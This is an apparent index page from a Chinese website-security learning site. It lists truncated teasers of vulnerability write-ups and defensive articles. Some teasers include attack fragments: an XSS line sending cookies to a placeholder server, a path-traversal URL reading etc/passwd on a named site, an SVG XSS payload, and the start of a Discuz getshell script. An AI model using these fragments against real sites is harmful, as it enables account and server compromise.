网站安全-好得很程序员自学网

黑客如何利用SQL注入漏洞攻破一个WordPress网站

前几天微软skype的官方博客网站被黑客突破，虽然很快进行了修复，但从网友截屏的图片来看，应该一些抗议美国国安局监听行为和反对微软在软件里隐藏后门的黑客所为。微软skype的官...

阅读:95次

基于AST抽象语法树的SQL注入检测 (1) - 网站安全

本周继续关注数据库防火墙相关知识:如果说渗透是攻击的话，那数据库防火墙就是防守了，第一次接触这块内容，上网找了一下资料，然后发现git上的开源项目druid又是java的，果断下载...

阅读:80次

机锋网Struts框架漏洞可导致内网渗透 - 网站安全

http: weibo com u 3022690473欢迎收听我的微博！其实这个问题是由于一个远程命令执行引起的内网渗透问题出在机锋市场合作厂商管理后台： http: amarket channel gfan com system LoginAction!login act...

阅读:109次

Web应用安全检测和防御机制 - 网站安全 - 自学p

随着互联网逐渐深入人们的生活，互联网企业也从单纯的信息供给过度到应用供给的时代，从早期的门户之争，慢慢演变成应用之战。人们可以在互联网上完成购物、社交、拍卖、交易...

阅读:93次

QQ邮箱是如何泄密的：JSON劫持漏洞攻防原理及演

翻译：Tianyi_Ting 校对批注：newghost注* 作者发表这篇文章的时间较早，某些方法可能并不是最好的解决方案，但针对这种漏洞进行的攻击还依然可见，如早期的：QQMail邮件泄露漏洞。直到...

阅读:113次

脉搏网平行权限+CSRF让开复老师帮你发微博 - 网站

脉搏网平行权限+CSRF。让开复老师帮你发微博。问题发生在http: www vmaibo com timer定时发生功能设置一个定时发送的微博由于修改功能存在平行权限，可以修改别人的定时微博内容！也就说...

阅读:84次

逐浪CMS任意文件类型上传获取webshell - 网站安全

没有对上传文件类型进行判断，可直接上传动态脚本获取webshell从官网下载cms代码在源码目录下的edit目录下batupload aspx文件通过反编译看到源码如下protected void Page_Load(object sender, EventA...

阅读:78次

人人网某分站逻辑问题导致沦陷 - 网站安全 - 自

还是万恶的wordpress，虽说核心代码安全系数很高，但是逻辑缺陷却导致暴力破解问题域名：http: fed renren com好吧，可以自动化fuzz了1、http: ued aili com ?author=*（1、2、3、。。。）得到用户名...

阅读:92次

畅途网任意用户订单遍历（大量敏感信息） - 网

问题出在畅途的app端，手机手机登陆之后，发现查询请求几乎没有任何验证呀，仅有的参数pkTicketOrderId和userId之间也没有相互校验，进行查询数据包如下；POST http: ios update trip8080 com ip...

阅读:83次

提升WEB应用程序安全需要打“组合拳” - 网站安

由于WEB应用程序对于当今许多企业的内部和外部操作都极端重要，所以其可用性和安全性既是客户的期望又是其要求。因而，企业应该在WEB应用程序问题上不惜一切代价。同时，WEB应用...

阅读:95次

雷霆游戏任意重置账户密码 - 网站安全 - 自学p

游戏厂商的安全意识实在薄弱。今天屌丝无聊看到17173上斗仙这网游蛮火，送4999人民币送100天，牛逼。进去试了一下，如此严重的漏洞。求礼物。三张图，管理员肯定懂了，如果厂商看...

阅读:103次

我是这样挖掘x-forwarded-for注入到成功注射的 - 网

如何查找这种注入，以前一直也很困惑啊，如果我手工一个一个测试，如果被我遇到了真的是人品大爆发了。问过@小胖子他当时说是可遇不可求的。但是我也不是就这么信了。好了说真...

阅读:100次

逐浪CMS通用型SQL注入8+9（select型） - 网站安全

似乎逐浪开始想完全闭源了。已经准备阻止大家进行反编译了，暂时还不知道是用什么方法，以后如果研究出来的话再说吧。所以官方别再扯什么XXX源码包了，不开源不是丢人的事情，...

阅读:85次

逐浪CMS通用型SQL注入6+7（update型） - 网站安全

某功能还是存在两个UPDATE型注入，咱们可以秒改管理员密码。当然了也可以insert管理员的，为了避免一些问题就不用insert来测试了涉及的两个类：public class MIS_Project_ProQuote : Page, IRequir...

阅读:77次

Vbmcms6.0&&7.0 update注入及修复 - 网站安全 -

最新版本7 0官网地址http: www vbmcms com index php目测全是教育站由于7 0版本收费于是在网上下载了6 0免费版本的来看，还发现不少漏洞各种insert 注入各种update注入但是我构造出语句后去网...

阅读:91次

反射xss利用方法，绕过IE xss filter - 网站安全 - 自

反射xss利用方法，绕过IE XSS Filter假设 1 php页面代码如下:echo $_GET[ 39;str 39;];使用IE浏览器访问该页面1 php?str=xss code由于xss filter渲染导致XSS不成功接下来我们要这么绕过呢？如果该站...

阅读:88次

小米科技某合作游戏BUG导致可秒杀高等级玩家

游戏未作数据验证或验证可绕过。小米科技公司与莱茵天下（北京）有限公司合作的游戏小米部落存在设计错误。漏洞1 日常任务可以通过修改本地内存的数据，以达到不用作任务，就可...

阅读:116次

Discuz的利用UC_KEY进行getshell - 网站安全 - 自学ph

?php 代码版权归原作者所有！ $timestamp = time()+10*3600; $host=127 0 0 1; $uc_key=eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5Waofq6J285Ca33i151e551g0l9f2l3dd; $code=urle...

阅读:78次

利腾讯大申网专题放置JS盗取用户cookies获取QQ及修

大申网专题审核不严，添加JS获取用户COOKIE，进而获取访客QQ号在内的COOKIE信息详细说明：利用购买的大申网（sh qq com）的专题上面放置JS，来获取访客COOKIES信息，进而提取访客QQ号，进...

阅读:90次

360网站宝/安全宝/加速乐及其他类似产品防护绕过

360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过在对GET请求处理的时候都能够识别攻击，但是一旦换成了POST请求或者是改造过的POST就不存在此问题了GET index php?id=1%2...

阅读:90次

phpcms v9后台远程代码执行漏洞（第三弹） - 网站

前台了来了几期，干脆来个后台代码执行。记住。。。这是后台2次SQL执行漏洞。。。看分析。。。phpcms 官方给力点，到时候俺给你还来几发在phpcms modules dbsource data php中add 方法方法很...

阅读:75次

被小伙伴们蠢哭了的那些事儿：找回密码篇 - 网

郑昀创建于2014-01-12；最后更新于2014-01-13 找回密码功能是漏洞传统重灾区，下面列出两个经典错误点，请引以为戒吧Web开发工程师们！Web安全：一）以为用户不会抓包不会看源码不会分...

阅读:80次

JBoss远程方法调用漏洞利用详解 - 网站安全 - 自学

早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章，对我等菜鸟来说那边文章看起来还是很吃力的，所以查了查国内外的资料，翻译写了这边文章，记录一下。在JBoss服...

阅读:91次

腾讯QQ群无需群主和管理员权限修改群资料(已修

我创建了一个群，在修改好群资料（昵称，简介等等）之后提交的时候进行抓包，然后把post的数据中的群号改成了我加入的一个群，提交完毕，我加入的群资料被改。下图为修改并提交...

阅读:102次

讨论“get”和“post”安全性 - 网站安全 - 自学

get安全，还是post安全？这或许是大家总结两者必须要分析的内容，因为这涉及到我们将内容从浏览器传送到服务器的安全性，选择不当将会带来巨大的不安全因素，从而可能带来巨大的...

阅读:87次

iGENUS5.0邮件系统的一些漏洞打包（注射及登陆等

没事的时候下载了iGENUS5 0来看了看，时间紧，只看了个大概。大量政府、学校、科研机构、大型公司在使用这套系统。先说下我使用的版本和环境：整套程序，没有防注入措施，除邮件...

阅读:132次

任我行CRM权限绕过、上传、XSS、SQL注入各种简单

任我行CRM系统的权限绕过、上传、XSS、SQL注入各种简单测试某公司内部网络使用这套系统，第一回见到，看到WEB应用就忍不住手贱~~1、上传个人平台里面的编写内部邮件的时候上传附件...

阅读:101次

C#防SQL注入代码的实现方法 - 网站安全 - 自学ph

对于网站的安全性，是每个网站开发者和运营者最关心的问题。网站一旦出现漏洞，那势必将造成很大的损失。为了提高网站的安全性，首先网站要防注入，最重要的是服务器的安全设...

阅读:95次

神州租车任意用户密码修改 - 网站安全 - 自学p

问题出在神州租车的app端，校验机制设计的太脆弱~下面是修改用户个人资料的请求数据包，数据包中的验证部分account、password居然是公共的所有用户的验证都是同样的值，又没有其他的...

阅读:125次

安全狗高权限时的提权方法 - 网站安全 - 自学p

当权限是administrator时可以直接上远控并且成功执行exe恶意文件远控上线有的管理员以为安装了安全狗就万无一失，但是有了键盘记录这不等于像我们拿到权限后要做的事情一样么。安全...

阅读:85次

iSiteCMS发布安全补丁后仍然有几处注射漏洞源码详

iSiteCMS 之前有过一个后台登陆时的注射，不过后来修复了，但是还有几处注射分布在XX模块以及XXX模块里本文对源代码进行了详细的分析源码分析请见详细说明，实站演示请见漏洞证明...

阅读:87次

链家旗下自如主站文件包含(读取) - 网站安全 -

http: www ziroom com index php?_a=click_p= etc passwd%00 jpg修复方案：你懂得...

阅读:87次

emlog官方插件导致xss可打管理员cookie - 网站安全

emlog官方的反垃圾评论插件（感觉70%以上的人在用,因为内核代码里没有垃圾评论的处理，要处理垃圾评论只有用插件），未对某处xss进行过滤导致直接打管理员cookie。代码如下：?phpwhi...

阅读:76次

派代网主站设计缺陷可删除任意文章 - 网站安全

注册了2个号。在主站可以直接发文章。然后我抓了包http: www paidai com managetopic php?action=user_del_topicboardid=47topicid=202807posterid=669387这是直接get操作删除文章的。然后另外一个号发一...

阅读:103次

xss如何加载远程js的一些tips - 网站安全 - 自学p

在早期，对于xss我们是这样利用的scriptwindow open( http: xxx xxx cookie asp?msg= +document cookie) script将 cookie之类的数据传递到自己的服务端但是如果要更为复杂的攻击的话，由于字符串长...

阅读:105次

大汉版通JCMS数据库配置文件读取 - 网站安全 - 自

由于读取xml文件时没有对传进的参数进行过滤，flowcode参数可控，配置文件地址WEB-INF config dbconfig xml，由于控制了文件后缀，只能读取xml文件EXP:http: www iswin org jcms workflow design readxml jsp...

阅读:98次

JSONP安全防范解决方案新思路 - 网站安全 - 自学

jsonp安全性防范，分为以下几点：1、防止callback参数意外截断js代码，特殊字符单引号双引号，换行符均存在风险2、防止callback参数恶意添加标签（如script），造成XSS漏洞3、防止跨域请求...

阅读:100次

齐博CMS存储型XSS可getshell（组合利用） - 网站安全

齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还...

阅读:86次

51CTO存在严重逻辑设计缺陷SHELL主站 - 网站安全

1 信息收集通过分析51cto com的网络结构，发现整体业务由多个分站构成，往往越多的系统会带来越多的安全问题，所以一个一个的摸索。~ linkphone cn 大面积使用PHPCMShttp: publish linkphone c...

阅读:85次

phpcms v9 前台无限制GETSHELL（第一弹） - 网站安全

0x01:介绍PHPCMS V9（后面简称V9）采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP（面向对象）方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展，代码维护...

阅读:88次

如何在网页上隐藏你的Email邮件地址 - 网站安全

你有一个网站，你想把email地址放在上面，让别人可以很方便地联系你，但是你又担心一旦公开邮箱地址，垃圾邮件可能会像洪水一样涌来。你的担心是对的。现在网上抓取邮件地址的...

阅读:92次

搜狐邮箱存储型XSS（需点击） - 网站安全 - 自学

对用户输入过滤不严，导致可植入恶意代码。payload:svga xlink:href=javascript：alert(document domain) target=_blanktextAAAAA text a svgimage和rect之类的，由于被过滤了width和heig...

阅读:93次

也买酒篡改总订单金额便宜买拉菲拉 - 网站安全

也买酒购物车逻辑设计缺陷，商品数量可为负，导致总金额任意篡改漏洞。详细说明：购物车总金额=商品1times;数量+商品2times;数量这里虽然前台限制了数量，但是可以通过篡改post的数据...

阅读:92次

科普跨站平台XSS SHELL使用方法 - 网站安全 - 自学

理解xss shell是什么之前，让我们一起回顾一下一些基本的xss（跨站脚本），xss是最常见的一个漏洞，存在于今天许多的web应用程序。xss是攻击者试图通过web应用程序执行恶意脚本的技术...

阅读:89次

攻击JavaWeb应用[9]-Server篇[2] - 网站安全 - 自学ph

注：在继后门篇后已经有很长时间没更新了，这次一打算写写Server[1]的续集。喜欢B S吗？那我们今天干脆就来写一个简单的Web服务器吧。0x01 WebServerWeb服务器可以解析(handles)HTTP协议。当...

阅读:74次

大汉通版jis统一身份认证系统漏洞打包 - 网站安

大汉通版jis统一身份认证系统:在用户修改信息时进行抓包发现POST:http: 10 11 5 201:9080 jis front upduser_do jspCONTENT:c_id=00000vc_loginid=adminvc_password=123456vc_pwd=123456vc_username=系统管...

阅读:113次

绕过网易oauth认证的redirect_uri限制劫持帐号token

这里是通过网易帐号登录56网的授权页面:https: api t 163 com oauth2 authorize?client_id=II5coZy8DdAtKt7aredirect_uri=http%3A%2F%2Fapp 56 com%2Fcooperate%2Findex php%3Faction%3DWeibo%26tag%3Dwy%26do...

阅读:84次

意大利网站后台POST注入记录 - 网站安全 - 自学

信息探测：目标站点：http: www sixxf it服务器IP：192 232 2xx 97（美国）环境平台：PHP服务器系统：Apache这次用网页探测这个站的信息不是很完整，直接奔主题吧，打开网站后台，在登录帐号...

阅读:85次

Siteserver CMS SQL注入漏洞一枚(官网BBS中枪) - 网站安

Siteserver CMS 存在SQL注入漏洞，已测试官网论坛和多个互联网实例。漏洞链接：siteserver CMS console_tableMetadata aspx?ENName=cms_ContentTableType=BackgroundContent类型：盲注修复方案：过滤...

阅读:91次

phpcms前台和(后台低权限)getshell1 - 网站安全 - 自学

1、首先先说前台的吧，估计很多站都开始补了。是针对phpcms 2008的，二次攻击范畴，二次解析getshell。在upload_field php中br $upload_allowext = !empty($C[ 39;upload_allowext 39;]) ? $C[ 39;u...

阅读:95次

网站安全最新更新教程及学习资料